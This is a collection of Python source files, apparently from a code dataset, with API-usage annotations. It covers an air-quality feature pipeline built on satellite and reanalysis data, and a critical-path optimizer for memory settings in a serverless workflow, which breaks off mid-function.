        the stored patch locations, in place.
        '''
        s = self.slices()
        for idx in range(len(self)):
            vol_out[tuple(s[idx, ...])] = sub_vols[idx]
        return
if __name__ == "__main__":
    # Library module; running it directly only prints a notice.
    print('just a bunch of functions')
| [
"numpy.random.default_rng",
"h5py.File",
"cupy.get_array_module"
] | [((10416, 10429), 'numpy.random.default_rng', 'default_rng', ([], {}), '()\n', (10427, 10429), False, 'from numpy.random import default_rng\n'), ((11412, 11436), 'cupy.get_array_module', 'cp.get_array_module', (['vol'], {}), '(vol)\n', (11431, 11436), True, 'import cupy as cp\n'), ((1890, 1911), 'h5py.File', 'h5py.File', (['fpath', '"""w"""'], {}), "(fpath, 'w')\n", (1899, 1911), False, 'import h5py\n'), ((3560, 3573), 'numpy.random.default_rng', 'default_rng', ([], {}), '()\n', (3571, 3573), False, 'from numpy.random import default_rng\n'), ((3897, 3918), 'h5py.File', 'h5py.File', (['fpath', '"""r"""'], {}), "(fpath, 'r')\n", (3906, 3918), False, 'import h5py\n')] |
import os
import tqdm
import pickle
import numpy as np
import pandas as pd
import geopandas as gpd
# Imports from eo-learn and sentinelhub-py
from eolearn.core import EOPatch, EOTask, LinearWorkflow, FeatureType
from sentinelhub import bbox_to_dimensions
from lib.utils import _get_point
from lib.data_utils import (get_era5_data,
get_modis_data,
get_elevation_data,
get_land_cover_data,
get_sen3_data,
get_s5p_data,
get_cams_data)
from algorithms.ensemble import get_feature_matrix_dict
def add_cams_col(gts, cams_eop):
    """Attach per-row CAMS "PM2_5" and "NO2_surface" columns to the ground-truth frame.

    For each (Date, lat, lon) row, the matching CAMS grid cell is located once
    per coordinate (cached) and the day's layer values are averaged in.
    Mutates ``gts`` in place; assumes its index is a 0..n-1 range.
    """
    grid_cache = {}
    day_index = np.array(cams_eop.meta_info['day'])
    for row_idx, (date, lat, lon) in enumerate(gts[["Date", "SITE_LATIT", "SITE_LONGI"]].values):
        coord = (lat, lon)
        if coord not in grid_cache:
            grid_cache[coord] = _get_point(lat, lon, cams_eop.data["PM2_5"][0], cams_eop.bbox)
        pt = grid_cache[coord]
        day_mask = date == day_index
        gts.loc[gts.index == row_idx, "PM2_5"] = cams_eop.data["PM2_5"][day_mask][:, pt[0], pt[1]].mean()
        gts.loc[gts.index == row_idx, "NO2_surface"] = cams_eop.data["NO2_surface"][day_mask][:, pt[0], pt[1]].mean()
def filter_gt(pm25_gt, cams_eop):
    """Add CAMS columns to the PM2.5 ground truth and drop rows that disagree with CAMS.

    CAMS PM2.5 is clamped at 115; rows where the station value and CAMS differ
    by more than 70% of the station value (and either exceeds 5) are removed.
    Returns the filtered frame.
    """
    add_cams_col(pm25_gt, cams_eop)
    # clamp CAMS PM2.5 at 115
    pm25_gt.loc[pm25_gt.PM2_5 > 115, "PM2_5"] = 115
    cams_vals = pm25_gt.PM2_5
    station_vals = pm25_gt.AirQuality
    disagree = (abs(station_vals - cams_vals) > station_vals * 0.7) & ((station_vals > 5) | (cams_vals > 5))
    return pm25_gt.loc[~disagree]
def get_day_eop(eop, date):
    """Average all frames of ``eop`` recorded on ``date`` into a single-frame EOPatch.

    Returns None when the patch has no frames for that day.
    """
    day_mask = eop.meta_info["day"] == date
    if not day_mask.any():
        return None
    averaged = {name: layer[day_mask].mean(0, keepdims=True) for name, layer in eop.data.items()}
    return EOPatch(data=averaged, meta_info={"date": date}, bbox=eop.bbox)
def save_pickle(obj, path):
    """Pickle ``obj`` to ``path``, creating parent directories as needed.

    BUGFIX: a bare filename (no directory component) used to crash because
    ``os.makedirs('')`` raises; the directory is now created only when one
    is present in the path.
    """
    parent = os.path.dirname(path)
    if parent:
        os.makedirs(parent, exist_ok=True)
    with open(path, "wb") as f:
        pickle.dump(obj, f)
def load_pickle(path):
    """Deserialize and return the pickled object stored at ``path``."""
    with open(path, "rb") as fh:
        return pickle.load(fh)
def get_data(indir, outdir, label, aoi, feature_keys, update=False):
    """Load (or build and cache) all raster data sources for an AOI and
    assemble per-day feature matrices aligned with the ground-truth dates.

    Parameters
    ----------
    indir, outdir : path-like
        input data root and cache/output directory (must support the `/` operator)
    label : str
        target pollutant; "NO2" selects the Sentinel-5P branch, anything
        else selects the CAMS / PM2.5 branch
    aoi : str
        area of interest, e.g. "Italy" or "South_Africa"
    feature_keys : list of str
        keys selecting which feature maps are stacked into the model input
    update : bool
        force rebuilding the cached data pickle even if it exists

    Returns
    -------
    (day_data, gts, target_size)
        day_data: dict with per-day "data", "date", "feat_dicts", "feats";
        gts: ground-truth GeoDataFrame; target_size: (rows, cols) tuple
    """
    # Data
    # NOTE(review): `dir` shadows the builtin name; left unchanged here.
    dir = indir/"ground_air_quality" / ("NO2" if label == "NO2" else "PM25")
    # assumes the first listed file shares the shapefile's basename -- TODO confirm
    gt_path = dir / (os.listdir(dir)[0][:-3] + 'shp')
    gts = gpd.read_file(gt_path)
    path = outdir / ("data_" + aoi + ".pkl")
    # reuse the cached pickle unless a rebuild is forced
    if os.path.isfile(path) and not update:
        data = load_pickle(path)
    else:
        data = {"land_cover": get_land_cover_data(indir/("corine" if aoi == "Italy" else ""), outdir),
                "era5": get_era5_data(indir/"era5", outdir),
                "cams": get_cams_data(indir/"CAMS", outdir),
                "modis": get_modis_data(indir/"modis_MCD19A2", outdir),
                "s5p": get_s5p_data(indir/'sentinel5P', outdir),
                "elevation": get_elevation_data(indir, outdir)}
        if aoi != "South_Africa":
            data["s3_eop"] = get_sen3_data(indir/"SEN3", outdir)
        save_pickle(data, path)
    # -----------
    # Day data
    day_data = {"data": [],
                "date": []}
    for date in tqdm.tqdm(gts.Date.unique()):
        # static layers are shared across days; dynamic ones are day-averaged
        _day_data = {
            "land_cover": data["land_cover"],
            "elevation": data["elevation"],
            "era5": get_day_eop(data["era5"], date),
            "modis": get_day_eop(data["modis"], date),
            # "s3": get_day_eop(data["s3"], date),
        }
        if label == "NO2":
            _day_data["s5p"] = get_day_eop(data["s5p"], date)
            if _day_data["s5p"] is None:
                continue
        else:
            _day_data["cams"] = get_day_eop(data["cams"], date)
        # skip any day where a required source has no frames
        if np.any([v is None for v in _day_data.values()]):
            print('Missing datapoint at date:', date, "datasets:", [k for k, v in _day_data.items() if v is None])
            continue
        assert np.all([v is not None for v in _day_data.values()])
        day_data["data"].append(_day_data)
        day_data["date"].append(date)
    # ------------------
    # Target size
    if label == "NO2":
        target_resolution = 1000
        in_eop = day_data["data"][0]["s5p"]
    else:
        target_resolution = 1000 if aoi == "Italy" else 10_000
        in_eop = day_data["data"][0]["cams"]
    # bbox_to_dimensions returns (width, height); reversed here to (rows, cols)
    target_size = bbox_to_dimensions(in_eop.bbox, target_resolution)[::-1]
    # -----------------
    day_data["feat_dicts"] = []
    day_data["feats"] = []
    for i in range(len(day_data["data"])):
        feat_dict = get_feature_matrix_dict(
            day_data["data"][i], target_size, label, verbose=False)
        day_data["feat_dicts"].append(feat_dict)
        # stack the selected feature maps along a new last axis
        # (presumably yielding (H, W, n_features) -- verify map shapes)
        feats = np.stack([feat_dict[k] for k in feature_keys], axis=-1)
        day_data["feats"].append(feats)
    return day_data, gts, target_size
| [
"numpy.stack",
"pickle.dump",
"sentinelhub.bbox_to_dimensions",
"lib.data_utils.get_sen3_data",
"os.path.dirname",
"lib.data_utils.get_cams_data",
"lib.data_utils.get_s5p_data",
"lib.data_utils.get_modis_data",
"lib.data_utils.get_era5_data",
"lib.data_utils.get_land_cover_data",
"os.path.isfile... | [((727, 762), 'numpy.array', 'np.array', (["cams_eop.meta_info['day']"], {}), "(cams_eop.meta_info['day'])\n", (735, 762), True, 'import numpy as np\n'), ((2439, 2461), 'geopandas.read_file', 'gpd.read_file', (['gt_path'], {}), '(gt_path)\n', (2452, 2461), True, 'import geopandas as gpd\n'), ((2017, 2038), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (2032, 2038), False, 'import os\n'), ((2095, 2114), 'pickle.dump', 'pickle.dump', (['obj', 'f'], {}), '(obj, f)\n', (2106, 2114), False, 'import pickle\n'), ((2186, 2200), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (2197, 2200), False, 'import pickle\n'), ((2515, 2535), 'os.path.isfile', 'os.path.isfile', (['path'], {}), '(path)\n', (2529, 2535), False, 'import os\n'), ((4431, 4481), 'sentinelhub.bbox_to_dimensions', 'bbox_to_dimensions', (['in_eop.bbox', 'target_resolution'], {}), '(in_eop.bbox, target_resolution)\n', (4449, 4481), False, 'from sentinelhub import bbox_to_dimensions\n'), ((4635, 4714), 'algorithms.ensemble.get_feature_matrix_dict', 'get_feature_matrix_dict', (["day_data['data'][i]", 'target_size', 'label'], {'verbose': '(False)'}), "(day_data['data'][i], target_size, label, verbose=False)\n", (4658, 4714), False, 'from algorithms.ensemble import get_feature_matrix_dict\n'), ((4794, 4849), 'numpy.stack', 'np.stack', (['[feat_dict[k] for k in feature_keys]'], {'axis': '(-1)'}), '([feat_dict[k] for k in feature_keys], axis=-1)\n', (4802, 4849), True, 'import numpy as np\n'), ((916, 978), 'lib.utils._get_point', '_get_point', (['lat', 'lon', "cams_eop.data['PM2_5'][0]", 'cams_eop.bbox'], {}), "(lat, lon, cams_eop.data['PM2_5'][0], cams_eop.bbox)\n", (926, 978), False, 'from lib.utils import _get_point\n'), ((2625, 2698), 'lib.data_utils.get_land_cover_data', 'get_land_cover_data', (["(indir / ('corine' if aoi == 'Italy' else ''))", 'outdir'], {}), "(indir / ('corine' if aoi == 'Italy' else ''), outdir)\n", (2644, 2698), False, 'from lib.data_utils import 
get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2722, 2759), 'lib.data_utils.get_era5_data', 'get_era5_data', (["(indir / 'era5')", 'outdir'], {}), "(indir / 'era5', outdir)\n", (2735, 2759), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2783, 2820), 'lib.data_utils.get_cams_data', 'get_cams_data', (["(indir / 'CAMS')", 'outdir'], {}), "(indir / 'CAMS', outdir)\n", (2796, 2820), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2845, 2892), 'lib.data_utils.get_modis_data', 'get_modis_data', (["(indir / 'modis_MCD19A2')", 'outdir'], {}), "(indir / 'modis_MCD19A2', outdir)\n", (2859, 2892), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2915, 2957), 'lib.data_utils.get_s5p_data', 'get_s5p_data', (["(indir / 'sentinel5P')", 'outdir'], {}), "(indir / 'sentinel5P', outdir)\n", (2927, 2957), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2986, 3019), 'lib.data_utils.get_elevation_data', 'get_elevation_data', (['indir', 'outdir'], {}), '(indir, outdir)\n', (3004, 3019), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((3084, 3121), 'lib.data_utils.get_sen3_data', 'get_sen3_data', (["(indir / 'SEN3')", 'outdir'], {}), "(indir / 'SEN3', outdir)\n", (3097, 3121), False, 'from lib.data_utils import get_era5_data, get_modis_data, get_elevation_data, get_land_cover_data, get_sen3_data, get_s5p_data, get_cams_data\n'), ((2396, 2411), 'os.listdir', 'os.listdir', (['dir'], 
{}), '(dir)\n', (2406, 2411), False, 'import os\n')] |
import itertools
import warnings
import networkx as nx
import numpy as np
import pandas as pd
from tqdm import tqdm
from AppGenerator import AppGenerator
from ServerlessAppWorkflow import ServerlessAppWorkflow
warnings.filterwarnings("ignore")
class PerfOpt:
    def __init__(self, Appworkflow, generate_perf_profile=True, mem_list=None):
        """Build the optimizer around a serverless app workflow.

        Parameters
        ----------
        Appworkflow : ServerlessAppWorkflow
            the workflow DAG to be optimized
        generate_perf_profile : bool
            if True, synthesize a runtime-vs-memory profile for every node
        mem_list : list of int, optional
            candidate memory sizes (MB); defaults to the 128..3008 range
            in 64 MB steps (the classic AWS Lambda configuration ladder)
        """
        self.App = Appworkflow
        # fixed seed so generated performance profiles are reproducible
        self.appgenerator = AppGenerator(seed=16, type='4PL')
        if mem_list is None:
            self.mem_list = [128, 192, 256, 320, 384, 448, 512, 576, 640, 704, 768, 832, 896, 960, 1024, 1088, 1152,
                             1216,
                             1280, 1344, 1408, 1472, 1536, 1600, 1664, 1728, 1792, 1856, 1920, 1984, 2048, 2112, 2176,
                             2240,
                             2304, 2368, 2432, 2496, 2560, 2624, 2688, 2752, 2816, 2880, 2944, 3008]
        else:
            self.mem_list = mem_list
        if generate_perf_profile:
            self.generate_perf_profile()
        # probe both extremes of the memory space to bound cost and latency
        self.minimal_mem_configuration, self.maximal_mem_configuration, self.maximal_cost, self.minimal_avg_rt, self.minimal_cost, self.maximal_avg_rt = self.get_optimization_boundary()
        self.update_BCR()
        # enumerate all start->end paths once; reused by the critical-path search
        self.all_simple_paths = [path for path in
                                 nx.all_simple_paths(self.App.deloopedG, self.App.startPoint, self.App.endPoint)]
        self.simple_paths_num = len(self.all_simple_paths)
        # counts how many times the critical path routine has been invoked
        self.CPcounter = 0
# Generate performance curve for each node in the workflow
def generate_perf_profile(self):
node_list = [item for item in self.App.workflowG.nodes]
node_list.remove('Start')
node_list.remove('End')
nx.set_node_attributes(self.App.workflowG, {}, 'perf_profile')
for node in node_list:
self.App.workflowG.nodes[node]['perf_profile'] = self.appgenerator.gen_rt_mem_data(node)
# Update mem and rt attributes of each node in the workflow
def update_mem_rt(self, G, mem_dict):
for node in mem_dict:
G.nodes[node]['mem'] = mem_dict[node]
G.nodes[node]['rt'] = G.nodes[node]['perf_profile'][mem_dict[node]]
# Update mem and rt attributes of each node in the workflow
    def update_App_workflow_mem_rt(self, App, mem_dict):
        """Apply mem_dict to App's workflow graph and refresh the app's response-time estimates."""
        self.update_mem_rt(App.workflowG, mem_dict)
        App.updateRT()
def get_perf_cost_table(self, file, start_iterations=1, end_iterations=None):
'''
Enumerate all possible combinations of memory. For each combination, calculate the end-to-end response time and average cost.
Save the results into a csv.
Args:
file (string): the name of the output csv to be saved
start_iterations (int): the start iterations e.g. 1 == start from the first iteration, 2 == start from the second iteration
end_iterations (int): the end iterations e.g. 10 == end after finishing the 10th iteration
'''
data = pd.DataFrame()
self.App.update_NE()
node_list = [item for item in self.App.workflowG.nodes]
node_list.remove('Start')
node_list.remove('End')
all_available_mem_list = []
for node in node_list:
all_available_mem_list.append(
[item for item in np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))])
if (end_iterations != None):
task_size = end_iterations - start_iterations + 1
else:
task_size = np.prod([len(item) for item in all_available_mem_list]) - start_iterations + 1
mem_configurations = itertools.product(*all_available_mem_list)
for i in range(start_iterations - 1):
next(mem_configurations)
iterations_count = start_iterations - 1
print('Get Performance Cost Table - Task Size: {}'.format(task_size))
if (end_iterations != None):
with tqdm(total=task_size) as pbar:
for mem_config in mem_configurations:
iterations_count += 1
current_mem_config = dict(zip(node_list, mem_config))
self.update_App_workflow_mem_rt(self.App, current_mem_config)
current_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
current_rt = self.App.get_avg_rt()
aRow = current_mem_config
aRow['Cost'] = current_cost
aRow['RT'] = current_rt
aRow = pd.Series(aRow).rename(iterations_count)
data = data.append(aRow)
pbar.update()
if (iterations_count >= end_iterations):
break
else:
with tqdm(total=task_size) as pbar:
for mem_config in mem_configurations:
iterations_count += 1
current_mem_config = dict(zip(node_list, mem_config))
self.update_App_workflow_mem_rt(self.App, current_mem_config)
current_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
current_rt = self.App.get_avg_rt()
aRow = current_mem_config
aRow['Cost'] = current_cost
aRow['RT'] = current_rt
aRow = pd.Series(aRow).rename(iterations_count)
data = data.append(aRow)
pbar.update()
data.to_csv(file, index=True)
def get_optimization_boundary(self):
node_list = [item for item in self.App.workflowG.nodes]
minimal_mem_configuration = {node: min(self.App.workflowG.nodes[node]['perf_profile'].keys()) for node in
node_list}
maximal_mem_configuration = {node: max(self.App.workflowG.nodes[node]['perf_profile'].keys()) for node in
node_list}
self.App.update_NE()
self.update_App_workflow_mem_rt(self.App, maximal_mem_configuration)
maximal_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
minimal_avg_rt = self.App.get_avg_rt()
self.update_App_workflow_mem_rt(self.App, minimal_mem_configuration)
minimal_cost = self.App.get_avg_cost()
self.App.get_simple_dag()
maximal_avg_rt = self.App.get_avg_rt()
return (minimal_mem_configuration, maximal_mem_configuration, maximal_cost, minimal_avg_rt, minimal_cost,
maximal_avg_rt)
# Get the Benefit Cost Ratio (absolute value) of each function
def update_BCR(self):
node_list = [item for item in self.App.workflowG.nodes]
for node in node_list:
available_mem_list = [item for item in np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))]
available_rt_list = [self.App.workflowG.nodes[node]['perf_profile'][item] for item in available_mem_list]
slope, intercept = np.linalg.lstsq(np.vstack([available_mem_list, np.ones(len(available_mem_list))]).T,
np.array(available_rt_list), rcond=None)[0]
self.App.workflowG.nodes[node]['BCR'] = np.abs(slope)
# Find the probability refined critical path in self.App
def find_PRCP(self, order=0, leastCritical=False):
self.CPcounter += 1
tp_list = self.App.getTP(self.App.deloopedG, self.all_simple_paths)
rt_list = self.App.sumRT_with_NE(self.all_simple_paths, includeStartNode=True, includeEndNode=True)
prrt_list = np.multiply(tp_list, rt_list)
if (leastCritical):
PRCP = np.argsort(prrt_list)[order]
else:
PRCP = np.argsort(prrt_list)[-1 - order]
return (self.all_simple_paths[PRCP])
# Update the list of available memory configurations in ascending order
    def update_available_mem_list(self, BCR=False, BCRthreshold=0.1, BCRinverse=False):
        """Store each node's candidate memory sizes (ascending) in its 'available_mem' attribute.

        With BCR=True, consecutive memory pairs whose marginal benefit-cost
        ratio falls below BCRthreshold times the node's fitted BCR are pruned;
        BCRinverse flips the ratio to delta-mem / delta-runtime.
        """
        node_list = [item for item in self.App.workflowG.nodes]
        for node in node_list:
            if (BCR):
                available_mem_list = [item for item in
                                      np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))]
                # consecutive (mem_i, mem_{i+1}) pairs for marginal-gain tests
                mem_zip = [item for item in zip(available_mem_list, available_mem_list[1:])]
                if (BCRinverse):
                    # keep pairs whose delta-mem / delta-rt exceeds threshold / BCR
                    available_mem_list = [item for item in mem_zip if np.abs((item[1] - item[0]) / (
                            self.App.workflowG.nodes[node]['perf_profile'][item[1]] -
                            self.App.workflowG.nodes[node]['perf_profile'][item[0]])) > 1.0 / (
                        self.App.workflowG.nodes[node]['BCR']) * BCRthreshold]
                else:
                    # keep pairs whose delta-rt / delta-mem exceeds BCR * threshold
                    available_mem_list = [item for item in mem_zip if np.abs((self.App.workflowG.nodes[node][
                                                                                  'perf_profile'][item[1]] -
                                                                              self.App.workflowG.nodes[node][
                                                                                  'perf_profile'][item[0]]) / (
                                                                                     item[1] - item[0])) >
                                          self.App.workflowG.nodes[node]['BCR'] * BCRthreshold]
                # flatten the surviving pairs back into a sorted, de-duplicated list
                available_mem_list = list(np.sort(list(set(itertools.chain(*available_mem_list)))))
            else:
                available_mem_list = [item for item in
                                      np.sort(list(self.App.workflowG.nodes[node]['perf_profile'].keys()))]
            self.App.workflowG.nodes[node]['available_mem'] = available_mem_list  # Sorted list
    def PRCPG_BPBC(self, budget, BCR=False, BCRtype="RT/M", BCRthreshold=0.1):
        '''
        Probability Refined Critical Path Algorithm - minimal end-to-end
        response time under a budget constraint (Best Performance under
        Budget Constraint).

        Args:
            budget (float): the budget constraint
            BCR (bool): True - use benefit-cost ratio optimization,
                False - do not use BCR optimization
            BCRtype (string):
                'RT/M'  - Benefit is RT, cost is memory.  Eliminates memory
                          configurations which do not conform to the BCR
                          limitation; greedy strategy picks the config with
                          maximal RT reduction.
                'ERT/C' - Benefit is the reduction of end-to-end response
                          time, cost is the increased cost; greedy strategy
                          picks the config with maximal RT reduction.
                'MAX'   - Same benefit/cost as 'ERT/C' but the greedy
                          strategy picks the config with maximal BCR.
            BCRthreshold (float): the threshold of the BCR cut-off

        Returns:
            tuple: (average end-to-end RT, average cost, memory
            configuration dict, number of greedy iterations)
        '''
        # Normalize legacy aliases for the BCR strategy names
        if BCRtype == 'rt-mem':
            BCRtype = 'RT/M'
        elif BCRtype == 'e2ert-cost':
            BCRtype = 'ERT/C'
        elif BCRtype == 'max':
            BCRtype = 'MAX'
        # Under 'RT/M' the per-node candidate memory lists are pre-filtered
        if (BCR and BCRtype == "RT/M"):
            self.update_available_mem_list(BCR=True, BCRthreshold=BCRthreshold, BCRinverse=False)
        else:
            self.update_available_mem_list(BCR=False)
        if (BCR):
            cost = self.minimal_cost
        # NOTE(review): the unconditional assignment below makes the
        # (BCR) branch above redundant — kept as-is
        cost = self.minimal_cost
        surplus = budget - cost
        # Start from the cheapest configuration (worst average RT)
        self.update_App_workflow_mem_rt(self.App, self.minimal_mem_configuration)
        current_avg_rt = self.maximal_avg_rt
        current_cost = self.minimal_cost
        last_e2ert_cost_BCR = 0
        order = 0
        iterations_count = 0
        # Greedily upgrade node memory while budget surplus remains
        while (round(surplus, 4) >= 0):
            iterations_count += 1
            # Operate on the currently most critical path
            cp = self.find_PRCP(order=order, leastCritical=False)
            max_avg_rt_reduction_of_each_node = {}
            mem_backup = nx.get_node_attributes(self.App.workflowG, 'mem')
            for node in cp:
                avg_rt_reduction_of_each_mem_config = {}
                # Try each memory size larger than the current one
                for mem in reversed(self.App.workflowG.nodes[node]['available_mem']):
                    if (mem <= mem_backup[node]):
                        break
                    self.update_App_workflow_mem_rt(self.App, {node: mem})
                    increased_cost = self.App.get_avg_cost() - current_cost
                    if (increased_cost < surplus):
                        self.App.get_simple_dag()
                        rt_reduction = current_avg_rt - self.App.get_avg_rt()
                        if (rt_reduction > 0):
                            avg_rt_reduction_of_each_mem_config[mem] = (rt_reduction, increased_cost)
                # Restore this node's memory before probing the next node
                self.update_App_workflow_mem_rt(self.App, {node: mem_backup[node]})
                if (BCR and BCRtype == "ERT/C"):
                    # Drop configs whose RT-per-cost ratio falls below a
                    # fraction of the previous iteration's ratio
                    avg_rt_reduction_of_each_mem_config = {item: avg_rt_reduction_of_each_mem_config[item] for item in
                                                           avg_rt_reduction_of_each_mem_config.keys() if
                                                           avg_rt_reduction_of_each_mem_config[item][0] /
                                                           avg_rt_reduction_of_each_mem_config[item][
                                                               1] > last_e2ert_cost_BCR * BCRthreshold}
                if (BCR and BCRtype == "MAX"):
                    # Attach the RT/cost ratio as a third tuple member
                    avg_rt_reduction_of_each_mem_config = {item: (
                        avg_rt_reduction_of_each_mem_config[item][0], avg_rt_reduction_of_each_mem_config[item][1],
                        avg_rt_reduction_of_each_mem_config[item][0] / avg_rt_reduction_of_each_mem_config[item][1]) for
                        item in avg_rt_reduction_of_each_mem_config.keys()}
                if (len(avg_rt_reduction_of_each_mem_config) != 0):
                    if (BCR and BCRtype == "MAX"):
                        max_BCR = np.max([item[2] for item in avg_rt_reduction_of_each_mem_config.values()])
                        max_rt_reduction_under_MAX_BCR = np.max(
                            [item[0] for item in avg_rt_reduction_of_each_mem_config.values() if
                             item[2] == max_BCR])
                        min_increased_cost_under_MAX_rt_reduction_MAX_BCR = np.min(
                            [item[1] for item in avg_rt_reduction_of_each_mem_config.values() if
                             item[0] == max_rt_reduction_under_MAX_BCR and item[2] == max_BCR])
                        # Map the winning value tuple back to its memory size
                        reversed_dict = dict(zip(avg_rt_reduction_of_each_mem_config.values(),
                                                 avg_rt_reduction_of_each_mem_config.keys()))
                        max_avg_rt_reduction_of_each_node[node] = (reversed_dict[(
                            max_rt_reduction_under_MAX_BCR, min_increased_cost_under_MAX_rt_reduction_MAX_BCR,
                            max_BCR)],
                                                                   max_rt_reduction_under_MAX_BCR,
                                                                   min_increased_cost_under_MAX_rt_reduction_MAX_BCR,
                                                                   max_BCR)
                    else:
                        max_rt_reduction = np.max([item[0] for item in avg_rt_reduction_of_each_mem_config.values()])
                        min_increased_cost_under_MAX_rt_reduction = np.min(
                            [item[1] for item in avg_rt_reduction_of_each_mem_config.values() if
                             item[0] == max_rt_reduction])
                        reversed_dict = dict(zip(avg_rt_reduction_of_each_mem_config.values(),
                                                 avg_rt_reduction_of_each_mem_config.keys()))
                        max_avg_rt_reduction_of_each_node[node] = (
                            reversed_dict[(max_rt_reduction, min_increased_cost_under_MAX_rt_reduction)],
                            max_rt_reduction,
                            min_increased_cost_under_MAX_rt_reduction)
            if (len(max_avg_rt_reduction_of_each_node) == 0):
                # No affordable improvement on this path: try the next most
                # critical path, or stop when every path is exhausted
                if (order >= self.simple_paths_num - 1):
                    break
                else:
                    order += 1
                    continue
            if (BCR and BCRtype == "MAX"):
                max_BCR = np.max([item[3] for item in max_avg_rt_reduction_of_each_node.values()])
                max_rt_reduction_under_MAX_BCR = np.max(
                    [item[1] for item in max_avg_rt_reduction_of_each_node.values() if item[3] == max_BCR])
                target_node = [key for key in max_avg_rt_reduction_of_each_node if
                               max_avg_rt_reduction_of_each_node[key][3] == max_BCR and
                               max_avg_rt_reduction_of_each_node[key][1] == max_rt_reduction_under_MAX_BCR][0]
                target_mem = max_avg_rt_reduction_of_each_node[target_node][0]
            else:
                max_rt_reduction = np.max([item[1] for item in max_avg_rt_reduction_of_each_node.values()])
                min_increased_cost_under_MAX_rt_reduction = np.min(
                    [item[2] for item in max_avg_rt_reduction_of_each_node.values() if item[1] == max_rt_reduction])
                target_mem = np.min([item[0] for item in max_avg_rt_reduction_of_each_node.values() if
                                     item[1] == max_rt_reduction and item[
                                         2] == min_increased_cost_under_MAX_rt_reduction])
                target_node = [key for key in max_avg_rt_reduction_of_each_node if
                               max_avg_rt_reduction_of_each_node[key] == (
                                   target_mem, max_rt_reduction, min_increased_cost_under_MAX_rt_reduction)][0]
            # Commit the best upgrade and refresh the running totals
            self.update_App_workflow_mem_rt(self.App, {target_node: target_mem})
            max_rt_reduction = max_avg_rt_reduction_of_each_node[target_node][1]
            min_increased_cost_under_MAX_rt_reduction = max_avg_rt_reduction_of_each_node[target_node][2]
            current_avg_rt = current_avg_rt - max_rt_reduction
            surplus = surplus - min_increased_cost_under_MAX_rt_reduction
            current_cost = self.App.get_avg_cost()
            current_e2ert_cost_BCR = max_rt_reduction / min_increased_cost_under_MAX_rt_reduction
            if (current_e2ert_cost_BCR == float('Inf')):
                last_e2ert_cost_BCR = 0
            else:
                last_e2ert_cost_BCR = current_e2ert_cost_BCR
        current_mem_configuration = nx.get_node_attributes(self.App.workflowG, 'mem')
        # The virtual Start/End nodes are not real functions
        del current_mem_configuration['Start']
        del current_mem_configuration['End']
        print('Optimized Memory Configuration: {}'.format(current_mem_configuration))
        print('Average end-to-end response time: {}'.format(current_avg_rt))
        print('Average Cost: {}'.format(current_cost))
        print('PRCP_BPBC Optimization Completed.')
        return (current_avg_rt, current_cost, current_mem_configuration, iterations_count)
    def PRCPG_BCPC(self, rt_constraint, BCR=False, BCRtype="M/RT", BCRthreshold=0.1):
        '''
        Probability Refined Critical Path Algorithm - minimal cost under an
        end-to-end response time constraint (Best Cost under Performance
        Constraint).

        Args:
            rt_constraint (float): end-to-end response time constraint
            BCR (bool): True - use benefit-cost ratio optimization,
                False - do not use BCR optimization
            BCRtype (string):
                'M/RT'  - Benefit is memory, cost is RT (inverse ratio).
                          Eliminates memory configurations which do not
                          conform to the BCR limitation.
                'C/ERT' - Benefit is the cost reduction, cost is the
                          increased end-to-end response time.
                'MAX'   - Same benefit/cost as 'C/ERT' but the greedy
                          strategy picks the config with maximal BCR.
            BCRthreshold (float): the threshold of the BCR cut-off

        Returns:
            tuple: (average end-to-end RT, average cost, memory
            configuration dict, number of greedy iterations)
        '''
        # Normalize legacy aliases for the BCR strategy names
        if BCRtype == 'rt-mem':
            BCRtype = 'M/RT'
        elif BCRtype == 'e2ert-cost':
            BCRtype = 'C/ERT'
        elif BCRtype == 'max':
            BCRtype = 'MAX'
        # Under 'M/RT' the per-node candidate memory lists are pre-filtered
        if (BCR and BCRtype == "M/RT"):
            self.update_available_mem_list(BCR=True, BCRthreshold=BCRthreshold, BCRinverse=True)
        else:
            self.update_available_mem_list(BCR=False)
        # Start from the most expensive configuration (best average RT)
        self.update_App_workflow_mem_rt(self.App, self.maximal_mem_configuration)
        current_avg_rt = self.minimal_avg_rt
        performance_surplus = rt_constraint - current_avg_rt
        current_cost = self.maximal_cost
        last_e2ert_cost_BCR = 0
        order = 0
        iterations_count = 0
        # Greedily downgrade node memory while RT slack remains
        while (round(performance_surplus, 4) >= 0):
            iterations_count += 1
            # Operate on the currently least critical path
            cp = self.find_PRCP(leastCritical=True, order=order)
            max_cost_reduction_of_each_node = {}
            mem_backup = nx.get_node_attributes(self.App.workflowG, 'mem')
            for node in cp:
                cost_reduction_of_each_mem_config = {}
                # Try each memory size smaller than the current one
                for mem in self.App.workflowG.nodes[node][
                        'available_mem']:
                    if (mem >= mem_backup[node]):
                        break
                    self.update_App_workflow_mem_rt(self.App, {node: mem})
                    self.App.get_simple_dag()
                    temp_avg_rt = self.App.get_avg_rt()
                    increased_rt = temp_avg_rt - current_avg_rt
                    cost_reduction = current_cost - self.App.get_avg_cost()
                    if (increased_rt < performance_surplus and cost_reduction > 0):
                        cost_reduction_of_each_mem_config[mem] = (cost_reduction, increased_rt)
                # Restore this node's memory before probing the next node
                self.update_App_workflow_mem_rt(self.App, {node: mem_backup[node]})
                if (BCR and BCRtype == 'C/ERT'):
                    # Drop configs whose cost-per-RT ratio falls below a
                    # fraction of the previous iteration's ratio
